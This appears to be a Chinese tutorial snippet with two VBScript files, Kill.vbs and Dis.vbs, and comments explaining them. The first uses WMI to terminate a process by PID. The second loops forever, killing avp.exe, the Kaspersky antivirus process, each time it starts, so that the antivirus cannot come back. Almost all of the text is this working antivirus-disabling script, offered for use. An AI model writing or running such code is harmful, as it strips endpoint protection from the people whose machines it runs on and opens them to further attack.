for each ps in getobject _ ("winmgmts://./root/cimv2:win32_process").instances_ '涉及到WMI脚本入侵技术,我不能解释清楚! if ps.handle=wscript.arguments(0) then '判断进程的PID号是否与获得的PID号参数相等 wscript.echo ps.terminate '如果相等就结束指定PID号对应的进程 end if next
Dis.vbs
复制代码代码如下:
dim y,x '不要这行也行…… do '来个死循环……一直在判断!do ... loop内为循环体! set y=getobject("winmgmts://./root/cimv2") '和上面解释一样,这也是涉及到微软的WMI技术! set x=y.execquery("select * from win32_process where name='avp.exe'") '查询语句,where后判断avp.exe(卡巴)是否存在进程中! '这样当卡巴被上面的Kill.vbs结束时就再也启动不起来了。除非,把Dis.vbs结束了先…… for each i in x i.terminate() '卡巴要启动马上就终止…… next wscript.sleep loop